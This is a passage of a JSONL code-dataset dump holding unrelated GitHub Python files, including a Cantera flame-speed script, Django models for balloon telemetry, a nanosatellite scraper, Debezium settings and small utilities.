JSONRenderer().render(data)\n return json_data\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to add the location : %s\"%(ex.message)})\n\n def remove_user_location_info(self, location_json):\n try:\n location_id = location_json[\"id\"]\n deleted_location = LocationInfoModelHandler().remove(location_id, self.current_user)\n return json.dumps({\"Sucess\":\"Location removed %s\"%(deleted_location.id)})\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to remove the location : %s\"%(ex.message)})\n\n def update_user_location_info(self, location_json):\n try:\n location = MasterLocationModelHandler().insert(location_name=location_json[\"location\"])\n\n updated_location_info = LocationInfoModelHandler().update(\n id = location_json[\"id\"],\n user = self.current_user,\n location = location,\n when_start_date = location_json[\"when_start_date\"],\n when_end_date = location_json[\"when_end_date\"])\n\n data = LocationInfoSerializer(updated_location_info).data\n json_data = JSONRenderer().render(data)\n return json_data\n except Exception as ex:\n return json.dumps({\"Error\":\"Not able to update the location : %s\"%(ex.message)})\n\n\n","repo_name":"vikaspandeysahaj/dostpost","sub_path":"dostpost/api/services/location_service.py","file_name":"location_service.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4769143465","text":"from unittest_find import unittest\nimport os\nos.environ[\"PYOPENCL_CTX\"] ='0:1'\nimport chroma.api as api\napi.use_opencl()\nimport chroma.gpu.cltools as cltools\nimport chroma.gpu.clrandstate as clrand\nimport pyopencl as cl\n\nimport ROOT as rt\n\nclass TestRandomGen( unittest.TestCase ):\n def setUp(self):\n self.context = cltools.get_last_context()\n self.nthreads_per_block = 1024\n self.blocks_per_iter = 1\n self.seed = 1\n\n self.nthreads = self.nthreads_per_block*self.blocks_per_iter\n\n def testRNG(self):\n states = clrand.get_rng_states( self.context, 10000, seed=0 )\n array = cltools.fill_array( self.context, states, 10000 )\n \n out = rt.TFile(\"output_testRNG.root\",\"recreate\")\n hout = rt.TH1D(\"hrand\",\"\",1000, -2, 2 )\n for a in array:\n hout.Fill(a)\n out.Write()\n out.Close()\n\n def tearDown(self):\n pass\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"NuTufts/chroma_lartpc","sub_path":"cltest/test_randomgen.py","file_name":"test_randomgen.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20277507253","text":"import math\nimport shutil\nimport os\nfrom typing import List\nfrom anomaly_detector.network.data_generator import DataGenerator\n\n\ndef split_test(test_path: str, n: int, **kwargs) -> None:\n all_videos = [\n video for video in next(os.walk(test_path))[1]\n if not (video.endswith('_optf') or video.startswith('Frames'))\n ]\n chunk_size = math.ceil(len(all_videos) / n)\n\n for i in range(n):\n chunk = all_videos[i * chunk_size:(i + 1) * chunk_size]\n\n for video in chunk:\n shutil.move(f'{test_path}/{video}', f'{test_path}/Test{i}/{video}')\n shutil.move(f'{test_path}/{video}_optf', f'{test_path}/Test{i}/{video}_optf')\n\n\ndef get_all_test(test_path: str, **kwargs) -> List[DataGenerator]:\n generators = []\n all_test = next(os.walk(test_path))[1]\n\n for test in all_test:\n data_generator = DataGenerator(f'{test_path}/{test}', **kwargs)\n generators.append(data_generator)\n\n return generators","repo_name":"SteveImmanuel/unet-anomaly-detection","sub_path":"anomaly_detector/utils/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19722199662","text":"######################################################\n# Ben Palmer University of Birmingham 2020\n# Free to use\n######################################################\n\n\nimport numpy\n\nclass colours:\n\n def lighten(colour_in, d):\n colour_in = colour_in.replace('#','')\n r = int(colour_in[0:2],16)\n g = int(colour_in[2:4],16)\n b = int(colour_in[4:6],16)\n \n r = int(min(max(0,(1 + d) * r),255))\n g = int(min(max(0,(1 + d) * g),255))\n b = int(min(max(0,(1 + d) * b),255))\n \n if(r < 16):\n r = '0' + str(colours.dentohex(r))\n else:\n r = str(colours.dentohex(r))\n \n if(g < 16):\n g = '0' + str(colours.dentohex(g))\n else:\n g = str(colours.dentohex(g))\n \n if(b < 16):\n b = '0' + str(colours.dentohex(b))\n else:\n b = str(colours.dentohex(b))\n \n colour_out = '#' + r + g + b \n \n return colour_out\n \n \n def dentohex(a):\n hexchars = \"0123456789ABCDEF\"\n output = ''\n if(a == 0):\n return '0'\n while(a > 0):\n b = a % 16\n a = int(numpy.floor(a / 16))\n output = hexchars[b] + output \n return output\n \n def hextoden(a):\n b = 0\n hexchars = \"0123456789ABCDEF\"\n for i in range(len(a)):\n k = len(a) - (i + 1)\n n = 0\n for j in range(len(hexchars)):\n if(a[k].upper() == hexchars[j]):\n n = j\n break\n b = b + n * 16**i\n return b\n \n def to_latex(colour, prefix=''):\n if(len(colour) != 7 and colour[0] != \"#\"):\n return ''\n colour_key = colours.colour_key(colour)\n r,g,b = colours.rgb(colour)\n return colour_key, r, g, b, '\\definecolor{'+colour_key+'}{RGB}{'+str(r)+','+str(g)+','+str(b)+'}'\n \n def rgb(colour):\n colour = colour.upper().strip()\n if(len(colour) != 7 and colour[0] != \"#\"):\n return 0,0,0\n return colours.hextoden(colour[1:3]),colours.hextoden(colour[3:5]), colours.hextoden(colour[5:7])\n \n def colour_key(colour):\n if(len(colour) != 7 and colour[0] != \"#\"):\n return ''\n return 'col_' + colour.replace('#','').lower()\n ","repo_name":"BenPalmer1983/tikzcrystal","sub_path":"src/colours.py","file_name":"colours.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41125359576","text":"\"\"\"\r\nA freely-propagating, premixed flat flame with multicomponent\r\ntransport properties.\r\n\"\"\"\r\nimport cantera as ct\r\nimport numpy as np\r\nimport csv\r\nimport os\r\n\r\n#print ct.__file__\r\n\r\np = ct.one_atm\r\ntburner = 300\r\ngas = ct.Solution('gri30.cti')\r\ngas.transport_model = 'Mix'\r\nmdot = 0.6\r\n\r\ninitial_grid = np.linspace(-0.01, 0.4, 9)\r\n\r\ntol_ss = [1.0e-5, 1.0e-10] # [rtol atol] for steady-state problem \r\ntol_ts = [1.0e-5, 1.0e-10] # [rtol atol] for time stepping loglevel = 1 # amount of diagnostic output (0 to 8)\r\nrefine_grid = True # 'True' to enable refinement, 'False' to disable\r\n\r\n# Mole Fractions\r\nEQUI = 1.4\r\nEQUI_END = 2.7\r\nphi_step = 0.1\r\nphi_steps = (np.ceil((EQUI_END - EQUI)/phi_step))+1\r\nn=0\r\nphi=[0]*phi_steps\r\nfs=[0]*phi_steps\r\n\r\nio2 = gas.species_index('O2'); #Index of O2 in mix\r\nin2 = gas.species_index('N2'); #Index of N2 in mix\r\nih2 = gas.species_index('H2'); #Index of N2 in mix\r\nich4 = gas.species_index('CH4'); #Index of N2 in mix\r\niar = gas.species_index('AR'); #Index of AR in mix \r\n\r\nfor EQUI in np.arange(EQUI, EQUI_END+0.001, phi_step):\r\n F1_Frac = 1.0;#Fraction of the first fuel in the blend\r\n F2_Frac = 0.0;#Fraction of the second fuel in the blend\r\n F3_Frac = 0.0;#Fraction of the third fuel in the blend\r\n #c = 2; #Number of moles of O2 for CH4\r\n #c= 1.25 #Number of moles for 50-50\r\n c=0.5 #Number of moles for H2\r\n\r\n comp = [0]*gas.n_species;\r\n comp[ich4] = F2_Frac * EQUI\r\n comp[ih2] = F1_Frac * EQUI\r\n comp[io2] = c\r\n comp[in2] = 3.76*c * 0.78/0.79 \r\n comp[iar] = 3.76*c * 0.01/0.79 \r\n\r\n gas.TPX = tburner, p, comp\r\n\r\n # Flame object\r\n f = ct.FreeFlame(gas, initial_grid)\r\n f.flame.set_steady_tolerances(default=tol_ss)\r\n f.flame.set_transient_tolerances(default=tol_ts)\r\n f.set_refine_criteria(ratio=2.7, slope=0.06, curve=0.12)\r\n f.set_grid_min(1e-9)\r\n\r\n # Set properties of the upstream fuel-air mixture\r\n f.inlet.T = tburner\r\n f.inlet.X = comp\r\n f.inlet.mdot = mdot\r\n\r\n f.transport_model = 'Mix'\r\n f.set_time_step(1e-5, [2, 5, 10])\r\n f.energy_enabled = False\r\n try:\r\n f.solve(loglevel=loglevel, refine_grid=False)\r\n except Exception:\r\n print (\"failed initial solve at phi = \", EQUI)\r\n f.energy_enabled = True\r\n\r\n try:\r\n f.solve(loglevel=loglevel, refine_grid=refine_grid)\r\n except Exception:\r\n print (\"failed mix solve at phi = \", EQUI)\r\n print (\"\\n***************MIX ENERGY {0:7f} {1:7f}***************\".format(EQUI, f.u[0]))\r\n\r\n f.transport_model = 'Multi'\r\n try:\r\n f.solve(loglevel=loglevel, refine_grid=refine_grid)\r\n except Exception:\r\n print (\"failed multi solve at phi = \", EQUI)\r\n print (\"\\n***************MULTI ENERGY {0:7f} {1:7f}***************\".format(EQUI, f.u[0]))\r\n\r\n f.soret_enabled = True\r\n try:\r\n f.solve(loglevel=loglevel, refine_grid=refine_grid)\r\n except Exception:\r\n print (\"failed soret solve at phi = \", EQUI)\r\n f.write_csv('profile-phi{:.1f}.csv'.format(EQUI), quiet=False)\r\n print (\"\\n***************MULTI ENERGY SORET {0:7f} {1:7f}***************\".format(EQUI, f.u[0]))\r\n\r\n phi[n]=EQUI\r\n fs[n] = f.u[0]\r\n n=n+1\r\n","repo_name":"pawelsikorski7/Laminar-flame-speed-methane-hydrogen","sub_path":"laminar flame speed methane-hydrogen.py","file_name":"laminar flame speed methane-hydrogen.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"74014443772","text":"\"\"\"\n Práctica 1 - Web Scraping\n\n Desarrollo de una herramienta para aplicar herramientas\n de web scraping sobre un sitio web, con el fin de extraer\n datos de interés y generar un dataset con dicha información.\n\n ==> Autores\n * Omar Mendo Mesa <@beejeke>\n * Guzmán Manuel Gómez Pérez <@GGP00>\n\n ==> Fichero\n * src/main.py\n\n ==> Descripción\n Fichero principal donde se ejecuta el scraper desarrollado.\n\"\"\"\n\n\nimport click\nfrom .methods import SatelliteScraper\n\n\n@click.group()\ndef cli():\n pass\n\n\ndef get_total_nanosats():\n scraper_ = SatelliteScraper()\n\n html = scraper_.get_html('https://www.nanosats.eu/database')\n nanosats_names = scraper_.get_nanosats_names_links(html)\n total = len(nanosats_names)\n\n return total\n\n\n@cli.command(help='Ejecuta el scraper para obtener datos de los nanosatélites analizados.')\n@click.option('--number', '-n', 'nanosats_n', default=get_total_nanosats(), show_default=True)\n@click.option('--status', '-s', 'status', default='all', show_default=True)\ndef scrape(nanosats_n, status):\n scraper = SatelliteScraper()\n scraper.scraper(int(nanosats_n), status)\n scraper.save_data_csv(nanosats_n, status)\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"beejeke/nanosat-scraping","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31974705882","text":"address = 'Four score and seven years ago...'\n\n# 공백을 찾아 index를 반환해주는 함수\n\n\ndef index_words_iter(text):\n if text:\n yield 0\n for idx, letter in enumerate(text):\n if letter == ' ':\n yield idx + 1\n\n\nit = index_words_iter(address)\nprint(next(it))\nprint(next(it))\nprint(list(it)) # 이터레이터에 상태가 있으므로 주의! 재사용 불가.\n\n\n# 리스트로 쉽게 변환 가능\nresult_list = list(index_words_iter(address))\nprint(result_list)\n","repo_name":"jongkyuu/Effective_Python","sub_path":"ch4_컴프리핸션과_제너레이터/bw30.py","file_name":"bw30.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74324303611","text":"from taskSwitching.component_rest import *\n\n\nclass ComponentStart(ComponentRest):\n \"\"\"\n Shows the next task type information.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n for k in kwargs.keys():\n self.__setattr__(k, kwargs[k])\n\n def main(self):\n # Will show the start card and wait for a keypress\n self.countdown.text = \"Press 1, 2, or 3 to begin\" \n self.draw()\n self.experiment.window.flip()\n \n self.experiment.synch.wait_for_button()\n","repo_name":"daniellekurtin/task_switching_paradigm","sub_path":"taskSwitching/component_start.py","file_name":"component_start.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"37961093749","text":"import os\n\n# Already downloaded in Dockerfile\nSCALA_VERSION = \"2.12\"\nSPARK_VERSION = \"3.1.2\"\nos.environ['PYSPARK_SUBMIT_ARGS'] = f\"--packages \" \\\n f\"org.apache.spark:spark-avro_{SCALA_VERSION}:{SPARK_VERSION},\" \\\n f\"org.apache.spark:spark-sql-kafka-0-10_{SCALA_VERSION}:{SPARK_VERSION},\" \\\n f\"mysql:mysql-connector-java:8.0.29 \" \\\n f\"pyspark-shell\"\n\n# Debezium Connector Settings\nDEBEZIUM_CONNECTOR_HOST = str(os.environ.get('DEBEZIUM_CONNECTOR_HOST'))\nDEBEZIUM_CONNECTOR_PORT = str(os.environ.get('DEBEZIUM_CONNECTOR_PORT'))\nKAFKA_BOOSTRAP_SERVERS = str(os.environ.get('BOOTSTRAP_SERVERS'))\n\n# Do not change the value of this property.\n# https://debezium.io/documentation/reference/stable/connectors/mysql.html#mysql-property-database-server-name\nCONNECTOR_NAMESPACE = \"dbserver1\"\nINCLUDED_DATABASE = \"inventory\"\nMYSQL_CONNECTOR_CONF = {\n \"name\": \"inventory-connector\",\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\",\n \"tasks.max\": \"1\",\n \"database.hostname\": str(os.environ.get('MYSQL_HOST')),\n \"database.port\": str(os.environ.get('MYSQL_PORT')),\n \"database.user\": str(os.environ.get('MYSQL_ROOT_USER')),\n \"database.password\": str(os.environ.get('MYSQL_ROOT_PASSWORD')),\n \"database.server.id\": \"184054\",\n \"database.server.name\": CONNECTOR_NAMESPACE,\n \"database.include.list\": INCLUDED_DATABASE,\n \"database.history.kafka.bootstrap.servers\": KAFKA_BOOSTRAP_SERVERS,\n \"database.history.kafka.topic\": \"dbhistory.inventory\",\n }\n}\n\n# JDBC settings for data stream writer\nJDBC_CONFIG = {\n \"driver\": \"com.mysql.jdbc.Driver\",\n \"url\": \"jdbc:mysql://mysql:3306/inventory?rewriteBatchedStatements=true\"\n}\n\nDB_CONFIG = {\n \"name\": \"mysql\",\n \"host\": os.environ.get('MYSQL_HOST'),\n \"port\": os.environ.get('MYSQL_PORT'),\n \"user\": os.environ.get('MYSQL_USER'),\n \"password\": os.environ.get('MYSQL_PASSWORD'),\n}\n","repo_name":"ntnhaatj/cdc-ingestion-debezium","sub_path":"svc/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"31194686509","text":"import numpy as np\nimport string\n\nclass Root:\n\tdef __init__(self):\n\t\tself.R=None\n\t\tself.L=None\n\nclass Column:\n\tdef __init__(self):\n\t\tself.R=None\n\t\tself.L=None\n\t\tself.U=None\n\t\tself.D=None\n\t\tself.S=0\n\t\tself.N=\"\"\n \nclass Node:\n\tdef __init__(self):\n\t\tself.R=None\n\t\tself.L=None\n\t\tself.U=None\n\t\tself.D=None\n\t\tself.C=None\n\ndef mat2linklist(A, column_names=None):\n\t\"\"\"\n\tA: 0-1 array\n\t\"\"\"\n\troot = Root()\n\ttmp1 = root\n\tr_n,c_n = A.shape \n\tnodes = [None] * c_n\n\tfor j in range(c_n):\n\t\tcolumn_header = Column()\n\t\tif column_names:\n\t\t\tcolumn_header.N = column_names[j]\n\t\telse:\n\t\t\tcolumn_header.N = j\n\t\ttmp2 = column_header\n\t\ttmp1.R = column_header\n\t\tcolumn_header.L = tmp1\n\t\ttmp1 = column_header\n\t\tcolumn = [None] * r_n\n\t\tfor i in range(r_n):\n\t\t\tif A[i,j] == 1:\n\t\t\t\tcolumn_header.S += 1\n\t\t\t\tnode = Node()\n\t\t\t\tcolumn[i] = node\n\t\t\t\tnode.C = column_header\n\t\t\t\ttmp2.D = node\n\t\t\t\tnode.U = tmp2\n\t\t\t\ttmp2 = node\n\t\tnodes[j] = column \n\t\ttmp2.D = column_header\n\t\tcolumn_header.U = tmp2\n\n\ttmp1.R=root\n\troot.L=tmp1\n \n\tfor i in range(r_n):\n\t\tfor j in range(c_n):\n\t\t\tif A[i,j] == 1:\n\t\t\t\ttmp = nodes[j][i]\n\t\t\t\t# keeps searching the next 1 on the right\n\t\t\t\tfor k in range(1, c_n+1):\n\t\t\t\t\tif A[i, np.mod(j+k, c_n)]==1:\n\t\t\t\t\t\tnode_r = nodes[np.mod(j+k,c_n)][i]\n\t\t\t\t\t\ttmp.R = node_r\n\t\t\t\t\t\tnode_r.L = tmp\n\t\t\t\t\t\ttmp = node_r\n\t\t\t\tbreak\n\treturn root\n\n","repo_name":"Varato/DancingLinks","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22203218945","text":"from django.db import models\nimport uuid\nimport cstruct\nimport base64\nimport datetime\n\nclass RawRequestLog(models.Model):\n\trequest_uuid = models.UUIDField(primary_key=True)\n\trequest_timestamp_utc = models.DateTimeField()\n\trequest_helium_integration_details = models.CharField(max_length=255, null=True)\n\trequest_text = models.CharField(max_length=8000)\n\n\tclass Meta:\n\t\tdb_table = 'supernova_raw_request_log'\n\nclass PacketEvent(models.Model):\n\trequest_uuid = models.OneToOneField(RawRequestLog, primary_key=True, on_delete=models.CASCADE, db_column='request_uuid')\n\trequest_timestamp_utc = models.DateTimeField()\n\trequest_helium_integration_details = models.CharField(max_length=255, null=True)\n\n\tapp_eui = models.CharField(max_length=16)\n\tdc_balance = models.IntegerField()\n\tdc_nonce = models.IntegerField()\n\tdev_eui = models.CharField(max_length=16)\n\tdevaddr = models.CharField(max_length=8)\n\tdownlink_url = models.URLField()\n\tfcnt = models.IntegerField()\n\tid = models.UUIDField()\n\thotspot_count = models.IntegerField()\n\tmetadata_adr_allowed = models.BooleanField()\n\tmetadata_cf_list_enabled = models.BooleanField()\n\tmetadata_multi_buy = models.IntegerField()\n\tmetadata_organization_id = models.CharField(max_length=36)\n\tmetadata_preferred_hotspots = models.JSONField()\n\tmetadata_rx_delay = models.IntegerField()\n\tmetadata_rx_delay_actual = models.IntegerField()\n\tmetadata_rx_delay_state = models.CharField(max_length=255)\n\tname = models.CharField(max_length=255)\n\tpayload = models.CharField(max_length=255)\n\tpayload_size = models.IntegerField()\n\tport = models.IntegerField()\n\traw_packet = models.CharField(max_length=255)\n\treplay = models.BooleanField()\n\treported_at = models.BigIntegerField()\n\ttype = models.CharField(max_length=255)\n\tuuid = models.UUIDField()\n\n\tclass Meta:\n\t\tdb_table = 'supernova_packet_event'\n\t\nclass PacketEventHotspot(models.Model):\n\tid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\n\t# one-to-many relationship with PacketEvent (one packet can have many hotspots)\n\trequest_uuid = models.ForeignKey(PacketEvent, on_delete=models.CASCADE, db_column='request_uuid')\n\t\n\thotspot_num_within_packet = models.IntegerField(null=False) # starts at 0\n\n\tchannel = models.IntegerField()\n\tfrequency = models.FloatField()\n\thold_time = models.IntegerField()\n\thotspot_id = models.CharField(max_length=255) # renamed from 'id'\n\tlat = models.FloatField()\n\tlong = models.FloatField()\n\tname = models.CharField(max_length=255)\n\treported_at = models.BigIntegerField()\n\trssi = models.FloatField()\n\tsnr = models.FloatField()\n\tspreading = models.CharField(max_length=255)\n\tstatus = models.CharField(max_length=255)\n\n\tclass Meta:\n\t\tdb_table = 'supernova_packet_event_hotspot'\n\n\t\t# set a unique key\n\t\tunique_together = (('request_uuid', 'hotspot_num_within_packet'),)\n\n\t\t# TODO add a constrant to ensure hotspot_num_within_packet < PacketEvent.hotspot_count\n\nclass PacketType1(models.Model):\n\trequest_uuid = models.OneToOneField(PacketEvent, primary_key=True, on_delete=models.CASCADE, db_column='request_uuid', related_name='packet_type_1')\n\trequest_timestamp_utc = models.DateTimeField()\n\trequest_helium_integration_details = models.CharField(max_length=255, null=True)\n\n\tpacket_type = models.PositiveIntegerField()\n\tmillis_since_boot = models.PositiveIntegerField()\n\tpacket_seq_num = models.PositiveIntegerField()\n\tlora_dr_value = models.PositiveIntegerField()\n\n\tthemistor_1_temperature_c = models.SmallIntegerField()\n\tthemistor_2_temperature_c = models.SmallIntegerField()\n\tdht_temperature_c = models.SmallIntegerField()\n\tdht_humidity_pct = models.SmallIntegerField()\n\tbmp_pressure_pa = models.FloatField()\n\tbmp_temperature_c = models.FloatField()\n\tbattery_voltage_mv = models.PositiveIntegerField()\n\tmcu_internal_temperature_c = models.SmallIntegerField()\n\tis_switch_rtf = models.BooleanField()\n\n\tgps_latitude_degrees = models.FloatField()\n\tgps_longitude_degrees = models.FloatField()\n\tgps_altitude_m = models.FloatField()\n\tgps_speed_m_per_s = models.FloatField()\n\tgps_course_degrees = models.FloatField()\n\n\tgps_satellite_count = models.PositiveIntegerField()\n\tgps_hdop_m = models.FloatField()\n\n\tgps_fix_date_epoch_time_sec = models.PositiveIntegerField()\n\tgps_fix_date_age_ms = models.PositiveIntegerField()\n\n\tclass Meta:\n\t\tdb_table = 'supernova_packet_type_1'\n\n\t@classmethod\n\tdef construct_from_base64(cls, base64_str: str, request_uuid: PacketEvent, request_timestamp_utc: datetime.datetime, request_helium_integration_details: str):\n\t\t\"\"\"\n\t\tConstructs a PacketType1 object from a hex string.\n\t\t\"\"\"\n\n\t\tclass DataPacket1CStruct(cstruct.MemCStruct):\n\t\t\t__def__ = \"\"\"\n\t\t\t\n\t\t\tstruct {\n\t\t\t\tuint8_t packet_type; // always 1 for this struct\n\t\t\t\tuint32_t millis_since_boot;\n\t\t\t\tuint16_t packet_seq_num;\n\t\t\t\tuint8_t lora_dr_value;\n\n\t\t\t\tint8_t themistor_1_temperature_c;\n\t\t\t\tint8_t themistor_2_temperature_c;\n\t\t\t\tint8_t dht_temperature_c;\n\t\t\t\tint8_t dht_humidity_pct;\n\t\t\t\tfloat bmp_pressure_pa;\n\t\t\t\tfloat bmp_temperature_c;\n\t\t\t\tuint16_t battery_voltage_mv;\n\t\t\t\tint8_t mcu_internal_temperature_c;\n\t\t\t\tuint8_t is_switch_rtf;\n\n\t\t\t\t// HERE is a good split if we ever wanted 2 different types of packets\n\t\t\t\tint32_t gps_latitude_degrees_x1e6;\n\t\t\t\tint32_t gps_longitude_degrees_x1e6;\n\t\t\t\tint32_t gps_altitude_cm;\n\t\t\t\tint32_t gps_speed_100ths_of_knot;\n\t\t\t\tint32_t gps_course_100ths_of_degree;\n\t\t\t\tuint16_t gps_satellite_count;\n\t\t\t\tint32_t gps_hdop_cm;\n\t\t\t\tuint32_t gps_fix_date_epoch_time_sec;\n\t\t\t\tuint32_t gps_fix_date_age_ms;\n\t\t\t};\n\t\t\t\"\"\"\n\n\t\tdata = base64.b64decode(base64_str)\n\t\tpacket = DataPacket1CStruct()\n\t\tpacket.unpack(data)\n\n\t\treturn cls(\n\t\t\trequest_uuid=request_uuid,\n\t\t\trequest_timestamp_utc=request_timestamp_utc,\n\t\t\trequest_helium_integration_details=request_helium_integration_details,\n\t\t\tpacket_type=packet.packet_type,\n\t\t\tmillis_since_boot=packet.millis_since_boot,\n\t\t\tpacket_seq_num=packet.packet_seq_num,\n\t\t\tlora_dr_value=packet.lora_dr_value,\n\t\t\tthemistor_1_temperature_c=packet.themistor_1_temperature_c,\n\t\t\tthemistor_2_temperature_c=packet.themistor_2_temperature_c,\n\t\t\tdht_temperature_c=packet.dht_temperature_c,\n\t\t\tdht_humidity_pct=packet.dht_humidity_pct,\n\t\t\tbmp_pressure_pa=packet.bmp_pressure_pa,\n\t\t\tbmp_temperature_c=packet.bmp_temperature_c,\n\t\t\tbattery_voltage_mv=packet.battery_voltage_mv,\n\t\t\tmcu_internal_temperature_c=packet.mcu_internal_temperature_c,\n\t\t\tis_switch_rtf=packet.is_switch_rtf,\n\t\t\tgps_latitude_degrees=packet.gps_latitude_degrees_x1e6 / 1e6,\n\t\t\tgps_longitude_degrees=packet.gps_longitude_degrees_x1e6 / 1e6,\n\t\t\tgps_altitude_m=packet.gps_altitude_cm / 100,\n\t\t\tgps_speed_m_per_s=packet.gps_speed_100ths_of_knot / 100 * 0.514444444, # knots to m/s\n\t\t\tgps_course_degrees=packet.gps_course_100ths_of_degree / 100,\n\t\t\tgps_satellite_count=packet.gps_satellite_count,\n\t\t\tgps_hdop_m=packet.gps_hdop_cm / 100,\n\t\t\tgps_fix_date_epoch_time_sec=packet.gps_fix_date_epoch_time_sec,\n\t\t\tgps_fix_date_age_ms=packet.gps_fix_date_age_ms,\n\t\t)\n\t","repo_name":"DeflateAwning/project-supernova-balloon-server","sub_path":"supernova/supernova_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72022218811","text":"def drive(cars_dict, car_name, drive_distance, needed_fuel):\n current_fuel = cars_dict[car_name]['fuel']\n if current_fuel < needed_fuel:\n print(\"Not enough fuel to make that ride\")\n else:\n cars_dict[car_name]['mileage'] += drive_distance\n cars_dict[car_name]['fuel'] -= needed_fuel\n print(f\"{car_name} driven for {drive_distance} kilometers. {needed_fuel} liters of fuel consumed.\")\n if cars_dict[car_name]['mileage'] >= 100000:\n del cars_dict[car_name]\n print(f\"Time to sell the {car_name}!\")\n return cars_dict\n\n\ndef refuel(cars_dict, car_name, refill_fuel):\n current_fuel = cars_dict[car_name]['fuel']\n if current_fuel + refill_fuel > 75:\n cars_dict[car_name]['fuel'] = 75\n print(f\"{car_name} refueled with {75 - current_fuel} liters\")\n else:\n cars_dict[car_name]['fuel'] += refill_fuel\n print(f\"{car_name} refueled with {refill_fuel} liters\")\n return cars_dict\n\n\ndef revert(cars_dict, car_name, given_kilometers):\n if cars_dict[car_name]['mileage'] - given_kilometers < 10000:\n cars_dict[car_name]['mileage'] = 10000\n else:\n cars_dict[car_name]['mileage'] -= given_kilometers\n print(f\"{car_name} mileage decreased by {given_kilometers} kilometers\")\n return cars_dict\n\n\nn = int(input())\ncars = {}\n\nfor _ in range(n):\n car_inf = input().split('|')\n cars[car_inf[0]] = {'mileage': int(car_inf[1]), 'fuel': int(car_inf[2])}\n\n\ndata = input()\n\nwhile not data == \"Stop\":\n splitted_data = data.split(\" : \")\n command = splitted_data[0]\n\n if command == \"Drive\":\n car = splitted_data[1]\n distance = int(splitted_data[2])\n fuel_need = int(splitted_data[3])\n cars = drive(cars, car, distance, fuel_need)\n elif command == \"Refuel\":\n car = splitted_data[1]\n fuel_refill = int(splitted_data[2])\n cars = refuel(cars, car, fuel_refill)\n elif command == \"Revert\":\n car = splitted_data[1]\n kilometers = int(splitted_data[2])\n cars = revert(cars, car, kilometers)\n\n data = input()\n\nsorted_cars = sorted(cars.items(), key=lambda x: (- x[1]['mileage'], x[0]))\n\nfor car, value in sorted_cars:\n print(f\"{car} -> Mileage: {value['mileage']} kms, Fuel in the tank: {value['fuel']} lt.\")\n\n\n\n\n","repo_name":"zhyordanova/Python-Fundamentals","sub_path":"Exam-Preparation/Final-Exam/need_for_speed.py","file_name":"need_for_speed.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71111228733","text":"from dlw.views import *\nimport dlw.views.globals as g\n@login_required\n@role_required(urlpass='/partqry/')\ndef partqry(request):\n wo_nop = empmast.objects.none()\n tm=shop_section.objects.all()\n tmp=[]\n for on in tm:\n tmp.append(on.section_code)\n context={\n 'sub':0,\n 'lenm' :2,\n 'nav':g.nav,\n 'subnav':g.subnav,\n 'ip':get_client_ip(request),\n 'roles':tmp\n }\n return render(request,'MISC/PARTQRY/partqry.html',context)\n\n\ndef partqry1(request):\n if request.method == 'GET' and request.is_ajax(): \n \n part= request.GET.get('Txtpart_no')\n data_list=list(Partnew.objects.filter(gm_ptno=part).values('gm_ptno','des','part_no','it_cat','um','mb').distinct()) \n if(len(data_list)>0):\n return JsonResponse(data_list,safe = False)\n else:\n data_list=list(Partnew.objects.filter(part_no=part).values('gm_ptno','des','part_no','it_cat','um','mb').distinct())\n if(len(data_list)>0):\n return JsonResponse(data_list,safe = False) \n return JsonResponse({\"success\":False},status=400)\n\n","repo_name":"CRISITPI/DLW2","sub_path":"dlw/views/misc/partqry/part_qry.py","file_name":"part_qry.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42936173488","text":"import torch.nn as nn\nimport torch\n\n\nclass BasicBlock(nn.Module): # 18层和34层\n expansion = 1 # 残差结构第三层卷积核个数是第一层的1倍\n\n def __init__(self, in_channel, out_channel, stride=1, downsample=None):\n # downsample代表下采样结构,就是我们残差结构的残差分支(也就是虚线部分),起到升维的作用\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_channel=in_channel, out_channel=out_channel, kernel_size=3, stride=stride, padding=1,\n bias=False)\n self.bn1 = nn.BatchNorm2d(out_channel)\n self.relu = nn.ReLU\n\n self.conv2 = nn.Conv2d(in_channel=out_channel, out_channels=out_channel, kernel_size=3, stride=1, padding=1,\n bias=False)\n self.bn2 = nn.BatchNorm2d(out_channel)\n self.downsample = downsample\n\n def 